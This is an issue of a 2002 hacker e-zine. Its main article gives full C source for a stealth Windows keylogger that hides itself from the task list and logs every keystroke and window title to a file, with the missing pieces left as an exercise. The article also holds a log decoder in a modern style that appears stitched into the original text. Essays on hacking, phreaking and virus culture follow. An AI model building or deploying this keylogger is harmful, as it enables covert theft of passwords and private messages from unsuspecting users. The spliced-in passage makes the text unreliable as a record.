Soli Deo gloria - To God alone be glory


Publication Date: April - May 2002

Editor: Arun Koshy

Contributors : Ayan Chakrabarti

DISCLAIMER : [Insert the biggest, most comprehensive lawyerspeak here]. Securitywriters.org (SWG) or the author(s) are NOT RESPONSIBLE for anything that happens to you, ur cat, dog, sexlife or wife after you go through the information presented below. Enjoy.

After the release of Issue #2, my friends @ SWG decided to attempt to make this effort mainstream. This column would feature technical issues (primarily) and some room for personal expression.

I advocate a "hands-on" approach .. we're not looking to rewrite what's already been written. Read/write a book if you want to do that. Get to the code or go straight to the point. You're free to send in your entries, comments etc. to hwcol@arunkoshy.cjb.net


Contents

Suggested Links :

HW issue #2 , Phrack , The Underground book , Coderz.net , Neworder

Music :

Joe Satriani (Crying, Always with me - Always with you, Circles, Tears in the Rain) 
Oasis (Champagne Supernova, Morning Glory, Wonderwall)


Advanced Meal - A keylogger in an API
By Ayan Chakrabarti

Ok. In the last article we looked into the GetAsyncKeyState API (or should I say KPI - Keylogger Programming Interface ;) and made a small program which used this API to detect keystrokes in all applications.

That program is going to form the core of our keylogger. But before we proceed we have to realise a few things

All right then, this is what we have to do. Let's start coding !!!

Ok, let's look at the file KBDLOG.C first. I suggest you just go through the code first before going on to the following explanations.

-=-= KBDLOG.C STARTS HERE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#include <windows.h>
#include <stdio.h>
#include <string.h>


int istime(void);
void getfname(char * fname);

unsigned int nlist[] = { 8,9,12,13,19,20,27,32,33,34,35,36,37,38,39,
                         40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,
                         57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,
                         81,82,83,84,85,86,87,88,89,90,91,93,96,97,98,99,100,
                         101,102,103,104,105,106,107,108,109,110,111,112,113,
                         114,115,116,117,118,119,120,121,122,123,124,125,126,
                         127,128,129,130,131,132,133,134,135,144,145,186,187,
                         188,189,190,191,192,219,220,221,222,223,224,225,226,
                         227,228,230,233,234,235,236,237,238,239,240,241,242,
                         243,244,245,246,247,248,249,250,251,252,253,254,0};


int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine, int nCmdShow)
{
        MSG msg;
        int i,alt,shf,ctrl;
        FILE * fp;
        HWND hw;
        char fn[1024],wint[1024],buf[1024],dirn[1024],fn2[1024];
        HANDLE h;
        HMODULE hKERNEL32;
        FARPROC a_Register;

        if ( (hKERNEL32 = GetModuleHandle("KERNEL32.DLL")) != NULL)
                if( ( a_Register = GetProcAddress(hKERNEL32,"RegisterServiceProcess")) != NULL)
                        a_Register( GetCurrentProcessId(), 1);

        GetWindowsDirectory(dirn,990);
        strcat(dirn,"\\KBDLOG");
        strcpy(fn,dirn);
        strcat(fn,"\\LOGFILE.KEY");
        
        strcpy(wint,"");

        while(1)
        {
             if(PeekMessage(&msg,NULL,0,0,0))
                 if(msg.message == WM_QUIT)
                       return 1;
   
             for(i = 0;nlist[i] != 0;i++)
             {
                if(GetAsyncKeyState(nlist[i])  == -32767)
                        break;

                if(i%15 == 0)
                        if(PeekMessage(&msg,NULL,0,0,0))
                                if(msg.message == WM_QUIT)
                                       return 1;
          
            }
            if(nlist[i] == 0)
                continue;

             if(PeekMessage(&msg,NULL,0,0,0))
                 if(msg.message == WM_QUIT)
                       return 1;
        
            hw = GetForegroundWindow();
            GetWindowText(hw,buf,1023);

            alt = shf = ctrl = 0;
            if(GetAsyncKeyState(16) != 0)
                shf = 1;
            if(GetAsyncKeyState(17) != 0)
                ctrl = 1;
            if(GetAsyncKeyState(18) != 0)
                alt = 1;

            if(PeekMessage(&msg,NULL,0,0,0))
                 if(msg.message == WM_QUIT)
                       return 1;
          
            if(istime())
            {
                getfname(fn2);
                MoveFile(fn,fn2);
                strcpy(wint,"");
            }

            fp = fopen(fn,"ab");
            if(!fp)
            {
                CreateDirectory(dirn,NULL);
                fp = fopen(fn,"ab");
            }

            if(strcmp(buf,wint) != 0)
            {
                strcpy(wint,buf);
                fputc(0,fp);
                fwrite(wint,strlen(wint)+1,1,fp);
            }

            if(alt || shf || ctrl)
            {
                fputc(1,fp);
                fputc(alt,fp);
                fputc(shf,fp);
                fputc(ctrl,fp);
            }
            fputc(nlist[i],fp);
            fclose(fp);

        }
}

-=-= KBDLOG.C ENDS HERE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

We'll leave the functions istime() and getfname() for the time being. The nlist array contains a list of all the key codes which we want to log and is terminated by a 0. Let's go straight to the WinMain function. As you may know, the WinMain function is what's called by the system when the program is run (like main is called in normal C programs).

Stealth:
Now the first thing that we come to is the following block of code -

if ( (hKERNEL32 = GetModuleHandle("KERNEL32.DLL")) != NULL)
  	if( ( a_Register = GetProcAddress(hKERNEL32,"RegisterServiceProcess")) != NULL)
       		a_Register( GetCurrentProcessId(), 1);

This is the code which is going to make us invisible in the task list. To pull this off, we use the API called RegisterServiceProcess. We call it with our process's ID (which we retrieve using GetCurrentProcessId) and the keylogger is registered as a system service and ceases to appear in the task list.

Now you may ask why we just don't go ahead and do

RegisterServiceProcess( GetCurrentProcessId(), 1);

The reason is simple. This API is only provided on Win 9x systems. It is not available on NT/2k machines. So if we were to call it directly, our program would generally give an error when run on an NT or 2k machine. So, we try loading the API dynamically, checking to see if it is available and calling it only if it is. Don't worry about this too much. Just remember that this will make the keylogger invisible on Win 9x systems.

Initialization:
The next few lines initialise a few things which will be used in the program.

        GetWindowsDirectory(dirn,990);
        strcat(dirn,"\\KBDLOG");
        strcpy(fn,dirn);
        strcat(fn,"\\LOGFILE.KEY");
        
        strcpy(wint,"");

The variable fn is the file to which we have to log the keystrokes. The variable wint holds the title of the current window. It's initialised to a blank string to begin with.

The Main Loop:
Before we study the loop, you'll see a set of statements appearing again and again.

           if(PeekMessage(&msg,NULL,0,0,0))
                 if(msg.message == WM_QUIT)
                       return 1;

Ok, I won't go into an in-depth explanation of Windows messages, but here's a brief one. Windows lets programs know about various things through messages: keypresses, mouse clicks, etc., when they need to repaint their windows and when they need to shut down. A program should periodically check to see what messages are waiting for it, otherwise problems can arise. For example, the system might be going for a shut down but the program refuses to quit. Also, on Win 9x systems, such a program might cause degradation of system performance. So, the lesson is that you should check up on your messages periodically.

PeekMessage is the function we use to get our messages. The reason we're using it instead of GetMessage (which you'll find in most examples) is that GetMessage blocks, ie. it won't return until there's a message waiting for the program. This is obviously undesirable. So we use PeekMessage, which returns immediately with a non-zero value if a message is waiting or with zero if no message is there. Then, if there's a WM_QUIT waiting for us, we quit our program.

Ok now for the main loop. Wherever I've put the above lines (PeekMessage et al), I'll replace with {CheckMessages} for clarity.

        while(1)
        {
             {CheckMessages}
   
             for(i = 0;nlist[i] != 0;i++)
             {
                if(GetAsyncKeyState(nlist[i])  == -32767)
                        break;

                if(i%15 == 0)
                        {CheckMessages}
          
            }
            if(nlist[i] == 0)
                continue;

OK. The first few lines should be familiar to you. They're pretty similar to the shell program we made last time. We check to see if a key in our list has been pressed since last time. Otherwise, continue in the loop. But if a key has been pressed ....

            {CheckMessages}
        
            hw = GetForegroundWindow();
            GetWindowText(hw,buf,1023);

If a key has been pressed, we get the title of the current window. The API GetForegroundWindow() returns a handle to the currently active window, and GetWindowText is used to retrieve the window title.

            alt = shf = ctrl = 0;
            if(GetAsyncKeyState(16) != 0)
                shf = 1;
            if(GetAsyncKeyState(17) != 0)
                ctrl = 1;
            if(GetAsyncKeyState(18) != 0)
                alt = 1;

            {CheckMessages}

Then we check the status of the [ALT], [SHIFT] and [CONTROL] keys. This helps in properly recording key combinations. Now that we've done all the preliminaries, it's time to write the stuff to the file.

          
            if(istime())
            {
                getfname(fn2);
                MoveFile(fn,fn2);
                strcpy(wint,"");
            }

These lines check if it is time to split our logfile. If istime() returns true (we'll discuss istime later; for now we'll assume that istime will return true whenever the logfile needs to be split), the current logfile will be renamed to a different name and we'll start logging into a fresh log file.

            fp = fopen(fn,"ab");
            if(!fp)
            {
                CreateDirectory(dirn,NULL);
                fp = fopen(fn,"ab");
            }

            if(strcmp(buf,wint) != 0)
            {
                strcpy(wint,buf);
                fputc(0,fp);
                fwrite(wint,strlen(wint)+1,1,fp);
            }

            if(alt || shf || ctrl)
            {
                fputc(1,fp);
                fputc(alt,fp);
                fputc(shf,fp);
                fputc(ctrl,fp);
            }
            fputc(nlist[i],fp);
            fclose(fp);

        }

This last bit opens the log file and dumps the recorded keystroke into the file. If the window title has changed since last logging (ie. focus has shifted to a new window), we also write the title of the window into the file. Before we write the title, we output the ASCII value 0 to let the reader (which we'll write later) know that a window title is coming up. Similarly, if the ALT, SHIFT or CONTROL keys are pressed, we output ASCII value 1 followed by the states of these keys so that the reader can properly interpret key combinations.
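For a responder who recovers a LOGFILE.KEY written by this program, the record layout just described (0 + NUL-terminated title, 1 + alt/shift/ctrl bytes, otherwise a bare key code) can be decoded as follows. This is an added example, not the reader the article promises; the sample bytes are constructed and the type and function names (KeyEvent, kbdlog_next, kbdlog_dump) are mine.

```c
#include <stdio.h>
#include <string.h>

/* Record markers written by KBDLOG.C. Every logged key code is >= 8,
 * so 0 and 1 never collide with a key byte. */
#define REC_TITLE 0   /* followed by NUL-terminated window title */
#define REC_MODS  1   /* followed by alt, shift, ctrl bytes, then key */

typedef struct {
    char title[1024];     /* window the key was typed into (carried over) */
    int alt, shf, ctrl;   /* modifier state recorded with this key */
    unsigned char key;    /* key code exactly as the logger stored it */
} KeyEvent;

/* Decode the next key event starting at log[*pos]. Returns 1 and advances
 * *pos on success, 0 at end of data or on a truncated record. The title
 * persists across calls because the logger only writes it on focus change. */
int kbdlog_next(const unsigned char *log, size_t len, size_t *pos, KeyEvent *ev)
{
    ev->alt = ev->shf = ev->ctrl = 0;
    while (*pos < len) {
        unsigned char b = log[(*pos)++];
        if (b == REC_TITLE) {
            const unsigned char *end = memchr(log + *pos, 0, len - *pos);
            size_t n;
            if (!end) return 0;                  /* no terminator: truncated */
            n = (size_t)(end - (log + *pos));
            if (n >= sizeof ev->title) n = sizeof ev->title - 1;
            memcpy(ev->title, log + *pos, n);
            ev->title[n] = 0;
            *pos = (size_t)(end - log) + 1;
        } else if (b == REC_MODS) {
            if (*pos + 3 > len) return 0;        /* flags cut off: truncated */
            ev->alt  = log[(*pos)++] != 0;
            ev->shf  = log[(*pos)++] != 0;
            ev->ctrl = log[(*pos)++] != 0;
        } else {
            ev->key = b;
            return 1;
        }
    }
    return 0;
}

/* Print every event in a recovered log; returns the number of events. */
int kbdlog_dump(const unsigned char *log, size_t len)
{
    KeyEvent ev; size_t pos = 0; int n = 0;
    ev.title[0] = 0;
    while (kbdlog_next(log, len, &pos, &ev)) {
        printf("[%s] %s%s%svk=0x%02X\n", ev.title, ev.ctrl ? "Ctrl+" : "",
               ev.alt ? "Alt+" : "", ev.shf ? "Shift+" : "", ev.key);
        n++;
    }
    return n;
}

/* Constructed sample: title "Notepad", Shift+H (0x48), i (0x49), Ctrl+S (0x53) */
static const unsigned char SAMPLE[] = {
    0, 'N','o','t','e','p','a','d', 0,
    1, 0, 1, 0, 0x48,
    0x49,
    1, 0, 0, 1, 0x53 };

int main(void) { return kbdlog_dump(SAMPLE, sizeof SAMPLE) == 3 ? 0 : 1; }
```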

With this we come to the end of this article. In the next article,

The program kbdlog.c is not compilable as such since the functions istime and getfname are not defined. You might try making these functions on your own deciding when the log files should be split and what the old log files should be called. This is left as an exercise.

Till the next article then .....

 


H/P/V - The Inc. story
By Arun Darlie Koshy

I strongly believe that the world is nothing but a fractal. Events, places, people and movements .. everything is repetitive in a large or small, subtle or loud way. I do not believe that I'm qualified to comment or say the things I'm about to say. But heck, I don't think that ever was an issue with me :-).

It seems we are at an inflexion point. I've had the opportunity to be a lurker/participant in the void for the past 7 years. We may have met under different faces or times. The timeframe presented many interesting viewpoints or "shifts". I've seen anarchy growing up to wear a suit n tie.

Civilization, it seems, hasn't spared Mentor's clan either.

H, the tale of two cities
Frankly speaking H has become like the music scene today. Everything is law abiding and subscribing to a format. We have big places to accumulate, irc rooms, message boards, "hills", "armies", honeypots and the elders. Shame on you if you don't belong somewhere or haven't published a X yet (where X can be a tutorial, advisory or crap like this ;-).

It is wrong or lame to ask how to break hotmail. Then again, you suspect its got something to do with the fact that it may be difficult to do so (leaving aside the lil peculiar theoretical plays of CSS, number tags, problems with your stupid browser or client-side attacks).

Funny how all of us say the first statement under an air of "you're so stupid, u don't even know this ?!, its too boring for me to tell u how k ? go away lamer!" .. anybody for "im too dumb to do it k ? please figure it out and tell me also, wake me up from my slumber" ?

I've come to a point where I've stopped reading. It freaks me out, another tutorial on FTP, or how the damned TCP/IP works, or how to convert binary to decimal, or wtf is a virus, how to set up trojans, or the unix manual (every rudimentary command's man page done by a million people separately) or the nth tutorial on C, perl or x n y.

All of it written by people who probably haven't broken into a single system, coded anything above 10k or done anything original in their entire lives. And the few who actually do know something find it tough to see beyond their own lives and are indeed wise in choosing that option. (I know both these statements are dangerously generalizing).

You even have a widely read and respected "How to become a hacker" doc. I remember that you have to learn Python, HTML to be one. Everything is the product of a "system". The open source movement,or to the latest zine. It is good. But we should not forget to call a bluff. We're in the goody good era. Everything is rosy. Peachy. Sickeningly sweet. It is either a cubicle or a classroom. We've moved from pipe bombs to discussions on "ethical hacking" or "Blackhat vs Whitehat".

Tell you what, let us stop being clintonian and messing with words and for the time being we will be what the media says we are. We love the limelight.

Time for me to work on my articles and I-am-elite programs. Have to move up the ladder you know. Become famous. The dichotomy of me. I thought of saying something stupid (this time I'm aware of it ;-)), here goes...

Hack O Genie, grant me the power to break into every system and that no one can break into mine.

P, the mystery that never was
There comes only one thought to my mind when I hear about phreaking .. wish I could figure out what to do to get my phone bills low. Now from reading the docs I've read, it's all some boxes, cards, cellphones and the historical whistle from a cereal box. I've kept Bluebeep for the sake of my being a collector.

This world does not even have a "how to hack hotmail ?" question. Talk/Bribe to your lineman. Use a scale or a coin. These are the tricks I've figured out here. Since I'm gutless to even do the above, I prefer to get shafted by the phone company. Pretty pathetic eh ?

In short P was dead before my time (and others of my age group ;-) for all practical reasons. Maybe it's too close to being seedy, criminal or slimy. It was never even born here in my country where the telex system is FUBAR 24-7 and too chaotic to deserve study.

All my friends in the USA, u don't know how lucky you are to get your local calls free.

I will bake a cake and send whatever is within my reach to the gal or guy who writes Phreaking 101 (post 2k) or World Domination 101 (the Microsoft case study). These are the two ways I see myself continuing to have my life, equipment and a cycle on the information superhighway.

V, Microsoft pulled the plug (unknowingly)
Read my earlier article. Now we come to the current situation. As expected, the brakes were pulled the moment we shifted to a *nix model... the current situation was easily predictable by the number of V efforts for the *nix or NT world. The V scene probably will mutate and integrate into something much different in feel and texture. The good people may still have it in them to bend a few more rules.

First of all the playing field will change with the death of a dominant PC operating system. Now we would be talking about devices, network appliances and an enlightened user who loves to try out 10 different operating systems.

A real good reference to understand all whats happening would be the latest 29A #6 (if u excuse some druggy articles ;-) ).

Some problems currently (from what i've heard from friends in the scene) are an abundance of people who don't code (resonant with the h scene here ;-) and the lack of clear thinking or relevant instruction for new members.

But I guess the basic issue(s) are :

PS : I also think it's time to phase out the word "PC". We should call it something like PID (Personal Information Device). Okay Mr. History, please note, that is my word!!

 


Welcome to my world
By Arun Darlie Koshy

It's been quite a month. I took a much needed break. During the last few days, I've been trying very hard to churn out something for this release. Quickly, I realized that it would be a compromise on my ideas regarding creativity. It's tough removing ego, or developing the healthy dose of insensitivity towards the demands of the outer world.

Frankly speaking, I've been quite detached from technology (computers, networks, crap) except using it as an instrument to remain in touch with loved ones and enhance my learning. It's a blessing that I've been attracted to the concept of experiencing joy rather than trying to fit myself into some particular way.

God has been kind enough to calm me down. Make me see what I can manage to change, open the doors towards music (learning the guitar, writing poetry has brought out the same feeling I got years ago trying to program :-)). Still trying hard to appreciate the value of friendship and love. Recently I was watching a show (won't name cause u would laugh ;-) in which one of the characters says "If you go long enough without love, you realize that it's the only thing". The month also presented very peculiar situations.

Also, I

Think about :

I read what I wrote above many times before sending it out. Each time it is different. Ranging from laughable, hypocritical, corny, sad, part of the story.. I have no idea... many of those times, I felt like never putting this out.

But, in a moment of strength or weakness and after lot of goody-goody editing, I've decided to put this strange collage of thoughts onto this very public medium.

LoL .. don't worry Hitch hasn't lost it yet. I will try to write something more "conventional" next time. My main objective was to get Ayan's good work to you all ASAP.

That's it for this time. This has been another cathartic attempt. Good night to you all...


All images, content & text (unless other ownership applies) are © copyrighted 2003, Infosecwriters.com. All rights reserved. Comments are property of the respective posters.